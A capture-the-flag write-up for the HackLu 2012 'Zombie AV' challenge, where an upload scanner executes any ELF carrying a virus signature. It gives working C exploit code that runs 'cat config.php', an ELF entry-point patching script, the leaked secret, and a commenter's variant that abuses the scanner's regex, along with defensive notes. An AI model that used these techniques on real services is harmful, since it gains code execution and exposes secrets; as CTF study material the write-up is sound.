HackLu CTF 2012 – Zombie AV (150) Write-up

2 – zombie AV
Some people try to fight the zombie apocalypse by selling pseudo antidote.
We need the secret formula in config.php to destroy their snake oil business…

Source: https://ctf.fluxfingers.net:2070/zombieav.zip
Page: https://ctf.fluxfingers.net:2070

This challenge is a web page that lets us upload 32-bit Linux ELF binaries. The site scans each upload for zombie viruses; if a binary is detected as infected, the server executes it in order to "clean" it and shows us whatever output the infected binary produces. In other words, the antivirus itself is the code-execution primitive: anything that trips the signature gets run on the server.

As we can see in the source code of scan.php, a binary counts as infected if the code at its entry point begins with the following 12-byte sequence (mov $0x1,%al, eight nops, int $0x80):

	/*
	 * hint: zombie virus signature is
	 * 8048340:	b0 01                	mov    $0x1,%al
	 * 8048342:	90                   	nop
	 * 8048343:	90                   	nop
	 * 8048344:	90                   	nop
	 * 8048345:	90                   	nop
	 * 8048346:	90                   	nop
	 * 8048347:	90                   	nop
	 * 8048348:	90                   	nop
	 * 8048349:	90                   	nop
	 * 804834a:	cd 80                	int    $0x80
	 */

So I crafted the following C code, which reads the contents of config.php, where the flag is located. The inline asm at the top of main() reproduces the signature; the three instructions after it re-create the stack frame that main()'s prologue normally sets up, because we are going to make the loader jump past that prologue:

#include <stdio.h>

int main(int argc, char** argv){
	/* Zombie virus signature: mov $0x1,%al ; 8 x nop ; int $0x80.
	 * One asm statement keeps the 12 bytes contiguous. The syscall is only
	 * exit() if the upper three bytes of %eax happen to be zero. */
	asm("mov $0x1, %al\n\t"
	    "nop\n\tnop\n\tnop\n\tnop\n\tnop\n\tnop\n\tnop\n\tnop\n\t"
	    "int $0x80");
	/* Stack adjustment: the patched entry point skips main()'s prologue,
	 * so set up an aligned frame with room for the locals ourselves. */
	asm("mov %esp,%ebp\n\t"
	    "and $0xfffffff0,%esp\n\t"
	    "sub $0x430,%esp");

	char buffer[1024];

	printf("Working...\n");

	FILE *output = popen("cat config.php", "r");

	if (!output) {
		printf("popen error!.\n");
		return -1;
	}

	/* Test the fgets() return value rather than feof(): feof() only becomes
	 * true after a read has failed, so a !feof() loop prints the last line twice. */
	while (fgets(buffer, sizeof(buffer), output) != NULL) {
		printf("-> %s", buffer);
	}
	pclose(output);
	return 0;
}

Now I need to modify the entry point of the generated ELF by hand: as compiled, the entry point is the C runtime's _start, and main() itself begins with the prologue the compiler generated, so the signature bytes are not the first thing the scanner disassembles.
The current entry point can be read with the following command:

$ readelf -h zombieav

The entry point is the e_entry field of the ELF header, a 4-byte little-endian value at file offset 0x18 in an ELF32 file. So I'll set it to 0x8048556 (bytes 56 85 04 08), which is the address where the zombie virus signature is located inside main():

francisco@sherminator:~$ gdb ./zombieav 
GNU gdb (Ubuntu/Linaro 7.3-0ubuntu2) 7.3-2011.08
(gdb) disas main
Dump of assembler code for function main:
   0x08048534 <+0>:	push   %ebp
   0x08048535 <+1>:	mov    %esp,%ebp
   0x08048537 <+3>:	and    $0xfffffff0,%esp
   0x0804853a <+6>:	sub    $0x430,%esp
   0x08048540 <+12>:	mov    0xc(%ebp),%eax
   0x08048543 <+15>:	mov    %eax,0x1c(%esp)
   0x08048547 <+19>:	mov    %gs:0x14,%eax
   0x0804854d <+25>:	mov    %eax,0x42c(%esp)
   0x08048554 <+32>:	xor    %eax,%eax
   0x08048556 <+34>:	mov    $0x1,%al
   0x08048558 <+36>:	nop
   0x08048559 <+37>:	nop
   0x0804855a <+38>:	nop
   0x0804855b <+39>:	nop
   0x0804855c <+40>:	nop
   0x0804855d <+41>:	nop
   0x0804855e <+42>:	nop
   0x0804855f <+43>:	nop
   0x08048560 <+44>:	int    $0x80
   0x08048562 <+46>:	mov    %esp,%ebp
   0x08048564 <+48>:	and    $0xfffffff0,%esp
   0x08048567 <+51>:	sub    $0x430,%esp
---Type <return> to continue, or q <return> to quit---q
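The steps above (locate the signature inside the compiled binary, translate its file offset to a load address, overwrite e_entry at offset 0x18) can be done in one go instead of with a hex editor. The script below is an added example for this write-up, not code from the challenge or from the original post; it parses the ELF32 header and program headers itself, refuses ELF64 and big-endian inputs rather than guessing, and ships with a constructed, non-runnable ELF32 image (signature at file offset 0x556 in a segment loaded at 0x08048000) so it can be exercised offline.

```python
import struct
import sys

ELF_MAGIC = b"\x7fELF"
ELFCLASS32 = 1
PT_LOAD = 1

# Zombie virus signature from the scan.php hint: mov $0x1,%al ; 8 x nop ; int $0x80
SIGNATURE = bytes.fromhex("b001") + b"\x90" * 8 + bytes.fromhex("cd80")

EHDR_FMT = "<16sHHIIIIIHHHHHH"          # Elf32_Ehdr, little-endian, 52 bytes
EHDR_FIELDS = ("e_ident", "e_type", "e_machine", "e_version", "e_entry",
               "e_phoff", "e_shoff", "e_flags", "e_ehsize", "e_phentsize",
               "e_phnum", "e_shentsize", "e_shnum", "e_shstrndx")
PHDR_FMT = "<IIIIIIII"                  # Elf32_Phdr, 32 bytes
E_ENTRY_OFFSET = 0x18                   # e_ident(16) + e_type(2) + e_machine(2) + e_version(4)
EHDR_SIZE = struct.calcsize(EHDR_FMT)
PHDR_SIZE = struct.calcsize(PHDR_FMT)


def parse_ehdr(data):
    """Decode the ELF32 header; refuse anything that is not little-endian ELF32."""
    if data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    if data[4] != ELFCLASS32 or data[5] != 1:
        raise ValueError("only little-endian ELF32 is handled")
    return dict(zip(EHDR_FIELDS, struct.unpack_from(EHDR_FMT, data, 0)))


def file_offset_to_vaddr(data, ehdr, offset):
    """Translate a file offset to its load address via the PT_LOAD program headers."""
    for i in range(ehdr["e_phnum"]):
        p_type, p_offset, p_vaddr, _, p_filesz, _, _, _ = struct.unpack_from(
            PHDR_FMT, data, ehdr["e_phoff"] + i * ehdr["e_phentsize"])
        if p_type == PT_LOAD and p_offset <= offset < p_offset + p_filesz:
            return p_vaddr + (offset - p_offset)
    raise ValueError("file offset 0x%x is not inside any PT_LOAD segment" % offset)


def find_signature_vaddr(data):
    """Virtual address of the first occurrence of the signature bytes."""
    ehdr = parse_ehdr(data)
    off = data.find(SIGNATURE)
    if off < 0:
        raise ValueError("signature not found in file")
    return file_offset_to_vaddr(data, ehdr, off)


def patch_entry(data, new_entry):
    """Return a copy of the image with e_entry (file offset 0x18) set to new_entry."""
    parse_ehdr(data)  # validate the header before writing into it
    out = bytearray(data)
    struct.pack_into("<I", out, E_ENTRY_OFFSET, new_entry)
    return bytes(out)


def retarget_entry_to_signature(data):
    """Point e_entry at the signature; returns (patched image, chosen address)."""
    vaddr = find_signature_vaddr(data)
    return patch_entry(data, vaddr), vaddr


def build_sample_elf():
    """Constructed test image (not a runnable binary): a valid ELF32 header, one
    PT_LOAD mapping file offset 0 to 0x08048000, and the signature at offset
    0x556, so it resolves to 0x08048556 like the binary in the write-up."""
    size = 0x600
    img = bytearray(size)
    e_ident = ELF_MAGIC + bytes([ELFCLASS32, 1, 1]) + b"\x00" * 9  # class, LSB data, version
    struct.pack_into(EHDR_FMT, img, 0, e_ident, 2, 3, 1, 0x08048534,  # ET_EXEC, EM_386, EV_CURRENT, e_entry
                     EHDR_SIZE, 0, 0, EHDR_SIZE, PHDR_SIZE, 1, 0, 0, 0)
    struct.pack_into(PHDR_FMT, img, EHDR_SIZE, PT_LOAD, 0, 0x08048000, 0x08048000,
                     size, size, 5, 0x1000)                          # p_flags 5 = R+X
    img[0x556:0x556 + len(SIGNATURE)] = SIGNATURE
    return bytes(img)


if __name__ == "__main__":
    # usage: python patch_entry.py zombieav zombieav.patched
    src, dst = sys.argv[1], sys.argv[2]
    with open(src, "rb") as f:
        image = f.read()
    patched, addr = retarget_entry_to_signature(image)
    with open(dst, "wb") as f:
        f.write(patched)
    print("e_entry set to 0x%08x" % addr)
```

The offset-to-address translation matters because the signature's file offset and its load address differ by the segment's p_vaddr minus p_offset; reading the address off a disassembly as the write-up does is equivalent, but the script does not depend on gdb being available. ELF64 also keeps e_entry at offset 0x18, but as an 8-byte field, which is why the script rejects it instead of writing four bytes into it.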

After uploading my crafted ELF file, I get the following output in the web page:

analysing file 33700f130a129f6c45028374ea5bc799
8048556:	b0 01                	mov    $0x1,%al
 8048558:	90                   	nop
 8048559:	90                   	nop
 804855a:	90                   	nop
 804855b:	90                   	nop
 804855c:	90                   	nop
 804855d:	90                   	nop
 804855e:	90                   	nop
 804855f:	90                   	nop
 8048560:	cd 80                	int    $0x80
 8048562:	89 e5                	mov    %esp,%ebp
 8048564:	83 e4 f0             	and    $0xfffffff0,%esp
 8048567:	81 ec 30 04 00 00    	sub    $0x430,%esp
 804856d:	c7 04 24 f0 86 04 08 	movl   $0x80486f0,(%esp)
 8048574:	e8 b7 fe ff ff       	call   8048430 <puts@plt>
 8048579:	c7 44 24 04 ff 86 04 	movl   $0x80486ff,0x4(%esp)
 8048580:	08 
 8048581:	c7 04 24 01 87 04 08 	movl   $0x8048701,(%esp)
 8048588:	e8 83 fe
Entry Opcodes are: b0 01 90 90 90 90 90 90 90 90 cd 80 
Signature is: cd53b957ec552afb39cba6daed7a9abc
found zombie virus, trying to execute it
*** stack smashing detected ***: upload/33700f130a129f6c45028374ea5bc799 terminated
======= Backtrace: =========
/lib32/libc.so.6(__fortify_fail+0x45)[0xf764d675]
/lib32/libc.so.6(+0x10362a)[0xf764d62a]
upload/33700f130a129f6c45028374ea5bc799[0x8048614]
[0xff978eb8]
======= Memory map: ========
08048000-08049000 r-xp 00000000 08:01 1713844                            /var/www/upload/33700f130a129f6c45028374ea5bc799
08049000-0804a000 r--p 00000000 08:01 1713844                            /var/www/upload/33700f130a129f6c45028374ea5bc799
0804a000-0804b000 rw-p 00001000 08:01 1713844                            /var/www/upload/33700f130a129f6c45028374ea5bc799
0855f000-08580000 rw-p 00000000 00:00 0                                  [heap]
f7526000-f7542000 r-xp 00000000 08:01 278593                             /usr/lib32/libgcc_s.so.1
f7542000-f7543000 r--p 0001b000 08:01 278593                             /usr/lib32/libgcc_s.so.1
f7543000-f7544000 rw-p 0001c000 08:01 278593                             /usr/lib32/libgcc_s.so.1
f7549000-f754a000 rw-p 00000000 00:00 0 
f754a000-f76ea000 r-xp 00000000 08:01 278151                             /lib32/libc-2.15.so
f76ea000-f76eb000 ---p 001a0000 08:01 278151                             /lib32/libc-2.15.so
f76eb000-f76ed000 r--p 001a0000 08:01 278151                             /lib32/libc-2.15.so
f76ed000-f76ee000 rw-p 001a2000 08:01 278151                             /lib32/libc-2.15.so
f76ee000-f76f2000 rw-p 00000000 00:00 0 
f76f5000-f76f8000 rw-p 00000000 00:00 0 
f76f8000-f76f9000 r-xp 00000000 00:00 0                                  [vdso]
f76f9000-f7719000 r-xp 00000000 08:01 278165                             /lib32/ld-2.15.so
f7719000-f771a000 r--p 0001f000 08:01 278165                             /lib32/ld-2.15.so
f771a000-f771b000 rw-p 00020000 08:01 278165                             /lib32/ld-2.15.so
ff958000-ff979000 rw-p 00000000 00:00 0                                  [stack]
Working...
-> <?php
-> 
-> $readelfpath='/usr/bin/readelf';
-> $objdumppath='/usr/bin/objdump';
-> $uploadpath='upload/';
-> $scriptpath='/var/www/';
-> $secret='55c4080daefb5f794c3527101882b50b';
-> 
-> ?>
-> ?>
Aborted
done we are safe

Ooops! The "stack smashing" abort looks alarming, but nothing was actually overwritten: the patched entry point jumps straight to the signature, past the prologue that stores the stack canary at 0x42c(%esp) (main+19 to main+25), and the hand-written stack adjustment moves %esp again anyway, so when main()'s epilogue compares that slot with %gs:0x14 the check fails and __fortify_fail aborts the process. By then popen() has already run cat config.php, and glibc 2.15 (see the memory map) still flushes stdio streams inside abort(), so the whole file, flag included, lands in the page output anyway. (The doubled "?>" at the end is the classic while (!feof()) pitfall: when fgets() hits EOF the stale buffer is printed once more; testing the return value of fgets() avoids it.) Either way, we get the key :)

So the flag for this challenge was: 55c4080daefb5f794c3527101882b50b.


2 thoughts on “HackLu CTF 2012 – Zombie AV (150) Write-up”

  1. nice variant)
    I changed the version value of the binary (bytes 0x14-0x17) to the address of the "zombie virus"

    #include <stdio.h>
    #include <stdlib.h>

    int abc() {
    __asm__("mov $0x1, %al\n\
    nop\n\
    nop\n\
    nop\n\
    nop\n\
    nop\n\
    nop\n\
    nop\n\
    nop\n\
    int $0x80");
    }

    int main() {
    system("cat config.php");
    }

    my address was 0x80483ff.

    $ readelf -h hw
    ……
    Version: 0x80483ff
    Entry point address: 0x8048300
    ……

    $output=shell_exec($readelfpath.' -h '.$contents);

    $data = preg_match( '/0x[a-fA-F0-9]{5,8}/', $output,$matches);
    $retValue=(hexdec($matches[0]) & 4294967288);

    this script gets the first 0x******** value as the EP

    Result:
    analysing file ab08a0576c07b9fd445894edcbf5921a
    80483ff: b0 01 mov $0x1,%al
    8048401: 90 nop
    8048402: 90 nop
    8048403: 90 nop
    8048404: 90 nop
    8048405: 90 nop
    8048406: 90 nop
    8048407: 90 nop
    8048408: 90 nop
    8048409: cd 80 int $0x80
    804840b: 5d pop %ebp
    804840c: c3 ret

    0804840d :
    804840d: 55 push %ebp
    804840e: 89 e5 mov %esp,%ebp
    8048410: 83 e4 f0 and $0xfffffff0,%esp
    8048413: 83 ec 10 sub $0x10,%esp
    8048416: c7 04 24 c0 84 04 08 movl $0x80484c0,(%esp)
    804841d: e8 ae fe ff ff call 80482d0
    8
    Entry Opcodes are: b0 01 90 90 90 90 90 90 90 90 cd 80
    Signature is: cd53b957ec552afb39cba6daed7a9abc
    found zombie virus, trying to execute it

    done we are safe
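The regex step quoted in the comment above is the reason the version-field trick works: scan.php takes the first 5-to-8-digit hex literal anywhere in the readelf -h output, and readelf prints e_version (the second "Version:" line) before "Entry point address:". The following is an added example, not code from scan.php or from the commenter, that reproduces that extraction on constructed readelf -h output and sets it beside a stricter version anchored on the field label. The readelf text is built inline and is illustrative; only the field layout follows what GNU readelf prints.

```python
import re

# Constructed sample of `readelf -h` output for an unmodified ELF32 binary.
# Field layout follows GNU readelf; the numbers are illustrative.
READELF_NORMAL = """\
ELF Header:
  Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF32
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Intel 80386
  Version:                           0x1
  Entry point address:               0x8048300
  Start of program headers:          52 (bytes into file)
  Start of section headers:          4412 (bytes into file)
  Flags:                             0x0
  Size of this header:               52 (bytes)
"""

# The same binary after e_version (file offset 0x14) was overwritten with the
# signature's address, as the comment describes. readelf prints that field
# verbatim on the second "Version:" line, which precedes the entry point line.
READELF_VERSION_PATCHED = READELF_NORMAL.replace(
    "Version:                           0x1\n",
    "Version:                           0x80483ff\n")

# Extraction as quoted from scan.php: the first 5-8 digit hex literal anywhere
# in the output is taken to be the entry point.
WEAK_RE = re.compile(r"0x[a-fA-F0-9]{5,8}")


def weak_entry(readelf_output):
    """scan.php's approach: whichever qualifying hex literal appears first wins."""
    m = WEAK_RE.search(readelf_output)
    return int(m.group(0), 16) if m else None


# Hardened extraction: anchor on the field label and the whole line, so a
# doctored e_version (or any other header field) cannot stand in for e_entry.
STRICT_RE = re.compile(
    r"^\s*Entry point address:\s+0x([0-9a-fA-F]{1,16})\s*$", re.MULTILINE)


def strict_entry(readelf_output):
    """Read only the 'Entry point address:' line."""
    m = STRICT_RE.search(readelf_output)
    return int(m.group(1), 16) if m else None


def scanner_was_fooled(readelf_output):
    """True when scan.php's regex would disassemble somewhere other than e_entry."""
    return weak_entry(readelf_output) != strict_entry(readelf_output)
```

Anchoring on the label only fixes the parsing; the scanner would still be disassembling at the address the attacker chose in the first place (the author's approach rewrites e_entry itself), and scan.php then executes the upload regardless of what the disassembly showed. A scanner that must run samples has to do so in a sandbox with no access to config.php.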
